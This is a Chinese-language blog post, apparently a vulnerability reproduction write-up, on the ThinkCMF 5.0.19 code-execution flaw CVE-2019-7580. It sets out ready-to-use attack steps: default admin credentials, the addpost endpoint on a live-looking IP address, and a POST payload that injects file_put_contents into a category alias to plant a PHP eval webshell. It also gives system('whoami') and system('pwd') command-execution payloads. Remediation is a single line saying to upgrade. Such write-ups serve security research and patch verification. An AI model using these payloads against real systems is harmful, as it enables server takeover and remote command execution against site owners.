thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现

所有文章,仅供安全研究与学习之用,后果自负!

thinkcmf 代码执行 (CVE-2019-7580)

复现小心会搞崩环境。

0x01 漏洞描述

ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf 5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。

这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞.

将payload插入数据库,写入data/conf/route.php文件

程序的入口是index.php,在index.php中\think\App::run()执行应用。

在App.php的run()函数139行,执行sef::exec();

0x02 影响范围

5.0.190111

0x03 漏洞复现

3.1 登录后台

admin 123456
/user/login/index.html
在这里插入图片描述

3.2 漏洞利用

3.2.1webshell

url:

http://118.193.36.37:34311/portal/admin_category/addpost.html

post 请求包:

parent_id=0&name=111&alias=1'=>array(""),file_put_contents('/var/www/html/public/shell.php','<?php eval($_POST[cmd]);?>'),'2

在这里插入图片描述
在根目录shell生成 文件 连接
在这里插入图片描述

3.2 phpinfo

/admin/index/index.html#/portal/admin_category/index.html
门户管理-》分类管理-》添加分类-》
在这里插入图片描述
在这里插入图片描述

3.3 获取系统命令

1’=>array(“”),system(‘whoami’),‘2
1’=>array(“”),system(‘pwd’),'2

0x04 漏洞修复

升级版本

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值